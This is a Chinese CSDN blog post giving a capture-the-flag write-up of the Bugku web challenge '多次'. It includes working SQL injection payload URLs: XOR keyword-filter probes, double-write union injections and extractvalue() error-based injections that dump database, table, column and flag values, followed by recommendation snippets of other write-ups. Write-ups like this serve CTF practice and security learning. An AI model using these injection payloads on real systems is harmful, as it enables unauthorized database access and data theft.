bugku web 多次

最新推荐文章于 2024-10-10 21:13:48 发布
最新推荐文章于 2024-10-10 21:13:48 发布
阅读量368 收藏
点赞数
文章标签: mysql 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/realstarstarli/article/details/108436479
版权

多次

在本题中采用一般的sql注入语法好像无法实现sql注入,进而能够解决该题所以猜测是因为字段被过滤了

异或为逻辑运算,当两个条件相同(同真或同假)时为假,当两个条件不同时为真。

在mysql中异或用^或xor来表示。

当url为http://123.206.87.240:9004/1ndex.php?id=1’^(length(‘and’)!=0)%23

  • 若and的长度为0(即为被过滤),则^(length(‘and’)!=0)为假,表达式就为id=1异或0=1,页面正常
  • 若and的长度为不为0(即为被过滤),则^(length(‘and’)!=0)为真,表达式就为id=1异或1=0,页面错误

检测被过滤字段

http://123.206.87.240:9004/1ndex.php?id=1’^(length(‘and’)!=0)%23

http://123.206.87.240:9004/1ndex.php?id=1’^(length(‘select’)!=0)%23

http://123.206.87.240:9004/1ndex.php?id=1’^(length(‘union’)!=0)%23

http://123.206.87.240:9004/1ndex.php?id=1’^(length(‘or’)!=0)%23

双写绕过

第一关

测试输出位置

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,2%23

得到位置2

暴历库

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,database()%23

库名:web1002-1

暴历表名(or需要绕过)

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema='web1002-1' %23

表名:flag1,hint

暴历字段

flag1表的内容

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(column_name) from infoorrmation_schema.columns where table_name='flag1'%23

得到字段:flag1,address

hint表的内容

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(column_name) from infoorrmation_schema.columns where table_name='hint'%23

得到字段:id,contents

暴历内容选flag1

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(flag1) from flag1 %23

得到:usOwycTju+FTUUzXosjr(第一个flag)

暴历内容选address

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(address) from flag1 %23

第二关

拿到下一关地址

我们看到页面中的内容是存在直接输出sql语句的(报错信息也是存在的)

采用基于extractvalue()和updatexml()的报错注入

学习教程https://blog.csdn.net/zpy1998zpy/article/details/80631036

简而言之通过extractvalue()或者updatexml()函数对xml文件进行查找,如果而且路径的格式正确那么就不会报错,无论是否存在该xml文件,但是如果访问的格式不正确那么就会报错,但是内容会从报错中体现。

这里采用extractvalue()进行爆破注入其实updatexml()是一样的

暴历库名:

http://123.206.87.240:9004/Once_More.php?id=1' and extractvalue('anything',concat('~',database()))) %23

得到:web1002-2

暴历表名

http://123.206.87.240:9004/Once_More.php?id=1' and extractvalue('anything',concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='web1002-2'))) %23

得到:class,flag2

暴历列名选flag2

http://123.206.87.240:9004/Once_More.php?id=1' and extractvalue('anything',concat('~',(select group_concat(column_name) from information_schema.columns where table_name='flag2'))) %23

得到:flag2,address

暴历内容

http://123.206.87.240:9004/Once_More.php?id=1' and extractvalue('anything',concat('~',(select group_concat(flag2) from flag2))) %23

得到flag:

flag {Bugku-sql_6s-2i-4t-bug}(小写提交)

address:./Have_Fun.php这是第三关的地址,但是本题只有两关所以这里便不再继续探究了

_starstarli
关注
Bugku Web CTF-多次
No Title
12-28 240
Bugku Web CTF-多次 看url构造,可控的值为id: http://123.206.87.240:9004/1ndex.php?id=5 尝试不同数字一直到id=5会提示可以在该页面进行SQL注入。 尝试不同的构造: http://123.206.87.240:9004/1ndex.php?id=5' 提示Error,Error,Error!,但双引号不报错: http://123...
BugKu Web(26-35)
kid的博客
09-11 1005
BugKu Web(26-35) 前言 发现以前做了几道题,然后凑成了10道写一下。确实做起来会发现和比赛的题相比质量还是要差很多。 但对于我这样的菜鸟拿来练习打打基础还是可以的 题目 过狗一句话 可以看到提示,给了一个一句话马,简化一下就是assert($_GET[‘s’])这么一个一句话 assert没怎么用过… 查了下可以用下面的函数来搜寻目录 scandir() //作用能扫描文...
Bugku web——多次
qq_40481505的博客
10-15 277
打开链接 首先对id尝试注入单引号和双引号,发现都报错 继续测试,发现下面结果: ?id=1' --+ (显示成功) ?id=1" --+ (显示成功) ?id=1' and 1=1 --+ (显示报错) ?id=1" and 1=1 --+ (显示成功) 猜测sql语句使用的是单引号,且对and继续过滤 使用下面代码验证 ?id=1'^(length('and')!=0)^' (显示成功...
bugku_web_多次
weixin_30642305的博客
10-02 191
这道题好难啊、、、多谢大佬的wp 整个页面没有任何可以入手的地方,再看URL:http://120.24.86.145:9004/1ndex.php?id=1 太明显的SQL注入了,然后给id多赋值几次,会发现作者又在各种忽悠我们,不过等到id=5的时候他告诉我们"You can do some SQL injection in here." 然后开始各种注入测试啊:   1、加...
Bugkuweb题目(多次)的解题
weixin_30556959的博客
03-07 121
这道题目我弄了好久,最后问了朋友,然后在朋友的帮助下,将flag找到了 这里写一下解题方法,记录一下 一进到这道题,看到了php?id=1,就很熟悉,很有可能是一道sql注入的题目,肯定是要试一下最简单的测试,(哪怕知道不可能是什么都没有过滤) 单引号出错 多加一个%23,发现不出错了 加上’ and 1=1%23 又出错了,可能是过滤了,但是不知道过滤了什么 这里有一个很好的方法知道过滤...
BugkuCTF之web题之多次
A_dmin的博客
12-10 7656
BugkuCTF之web题之多次
Bugku Web CTF-点击一百万次
No Title
12-10 515
Bugku Web CTF-点击一百万次 题目打开是一个巨大的cookie,可点击,并且点击100w次后会给flag。当然点是不可能点的,最开始我的思路是写一个js脚本自动点击,后来看别人的题解是自己提交表单。 查看网页源码可得这样一段js代码: <script> var clicks=0 $(function() { $("#cookie") ...
bugku web方向所有题解
kekefen01的博客
04-18 3152
第一题F12,第二题打开js文件,第三题 get参数 第四题转换成post请求最后空一行加入what=flag 注意最后不能加回车,不然会把what的值认为是"flag\n" 可以转换post加入参数,再转成get再转换成post 第五题php弱类型 num=1df 随便什么,反正$num==1都能通过 $num=$_GET['num']; if(!is_numeric($num)) { ech...
bugkuctf 多次sql2注入2
舞动的獾
07-27 473
这道题有两个关卡,主要是学到了点儿报错注入判断过滤,这里就记录一下 以为这个注入会与id的选取有所关系,爆破了一下,发现当id=5时,出现了如下的界面 但是,后面的尝试,发现注入的话,与id=5没啥大的关系 本题给我以后的注入提供了思路,我会首先判断’号的报错以及注释符的选取后,尝试找到哪些数据被过滤掉了。 当我们输入’ 尝试闭合:’#,失败了,’%23,%27%23,’–+ 尝试输入有多...
bugkuWeb小白解法---持续更新!
qq_42906381的博客
03-30 772
bugkuWeb!安排本文持续更新1滑稽一脸2验证码3请求get4请求post5矛盾 本文持续更新 这是我第二次使用 Markdown编辑器 。我将用他来写出自己的第一篇CSDN博客! 1滑稽一脸 打开网页之后,按下F12进入开发人员工具 点击调试程序,手慢的我已经让滑稽停不下来了 但是不经意间看见有个播放键,点一下,滑稽停了下来 舒服多了 然后搜索flag找到key复制 2验证码 打开网页 F...
BugkuCTF——web篇writeup(持续更新)
热门推荐
过客璇璇的博客
03-23 6万+
BugkuCTF——web篇writeup 平台网址:http://ctf.bugku.com/ 平台首页: web2 网址链接:http://120.24.86.145:8002/web2/ 页面: 一看只有好多滑稽,分数也不太高,应该不是很难,F12打开开发者工具看一下 得到ctf:flag KEY{Web-2-bugKssNNikls9100} 文件上传测试 链...
bugku中的多次题目以及学到的异或注入
mylyylmy的博客
08-01 3172
首先我们判断一下是什么注入类型 注意输入的是英文字符',中文不会转变为%27,报错,说明是字符注入 这时候我们就要判断一下SQL网站过滤了什么内容,我们可以使用异或注入来判断哪些字符串被过滤掉了 http://120.24.86.145:9004/1ndex.php?id=1%27^(0)%23 正常运行,我们在输入 http://120.24.86.145:9004/1nde...
bugku-Web-多次(异或注入,判断被过滤的关键字)☆
Sea_Sand息禅
12-13 959
进去看到url感觉是sql注入, 加上',报错但是%23不报错,加上'--+,也不报错,说明可以用--+注释 加上' or 1=1--+,报错 尝试' oorr 1=1--+,正常 说明or被过滤了. 那么怎么判断哪些关键字被过滤了呢,这里用到异或注入(同真异假)。 http://120.24.86.145:9004/1ndex.php?id=1'^(length('union')!=0...
【ctf】异或注入
chualam的博客
11-07 499
fuzz '^(length("select")!=0)--+ 双真或者双假为假 绕过检测方法:双写 seleselectct 注释方法 ‘ xxxx # ’ xxxx--+ or绕过 infoorrmation_schema updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) %23
bugku-多次 (详细)
偷一个月亮
06-20 1865
第一个考点:异或注入判断过滤关键字 ?id=1’^(length(‘union’)!=0)–+ 过滤的用双写绕过 GET /1ndex.php?id=-1' ununionion selselectect 2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=0x7765623130...
bugkuCTF Writeup (Web)10-14
Troublor的博客
01-24 4153
SQL注入1 代码审计 先过滤sql关键字,再过滤xss(实际上就是删除一些html标签),这个顺序就很好办了,把HTML标签插到sql关键字里面,就绕过了第一个过滤,第二个过滤之后就还原了sql关键字 之后就是基本的判断字段数、爆数据库名、爆flag payload:http://103.238.227.13:10087/?id=1 union select id,hash fr
Bugku Web题刷题记录(会持续更新)
s1054436218的博客
03-28 6050
之前web题做的不太多,现在多刷一点,写一下writeup记录一下,也方便以后复习。sql注入宽字符注入,题目说找key表的string字段了,so payload如下:http://103.238.227.13:10083/?id=1%df%27unionselect string,1 from sql5.key%23域名解析这道题写wp的时候打不开了,不过当时做的时候只要把host改成这个ip...
MySQL 09】表的内外连接
2301_76618602的博客
10-05 981
但是从上表可以看出,并不是每个学生都有成绩,但是我们也是要把没有成绩的学生也显示出来。由于员工名字在emp中,部门名称在dept中,因此我们需要对两表先做笛卡尔积,形成一张大的表,再从大的表中筛选出符合条件的。对stu表和exam表联合查询,把所有的成绩都显示出来,即使这个成绩没有学生与它对应,也要显示出来。我们理解了左外连接,那么右外连接也就能理解了,就是以右表为主,左边表没有符合条件的,那么就填NULL。可见内连接,只显示两表交集部分,因为只有1号和2号学生才有成绩,所以只显示1,2。
MySQL(B站CodeWithMosh)——2024.10.10(13)
最新发布
unicorn_lemon的博客
10-10 1149
运算符:LENGTH、UPPER、LOWER、LTRIM、RTRIM、SUBSTRING、LOCATE、REPLACE、CONCAT、NOW、CURDATE、YEAR、MONTH、DAY、HOUR、MINUTE、SECOND、DAYNAME、EXTRACT、DATE_FORM、DATE_ADD、INTERVAL、IFNULL、COALESCE、IF
Bugku网络漏洞挑战平台介绍及文件解析
"Bugku Web Vulnerability System" 描述了这个系统是一个针对Web应用程序的漏洞挖掘和测试平台。在这个平台上,用户可以通过各种挑战来识别和利用Web应用的安全漏洞。这些挑战可能包括跨站脚本攻击(XSS)、SQL注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值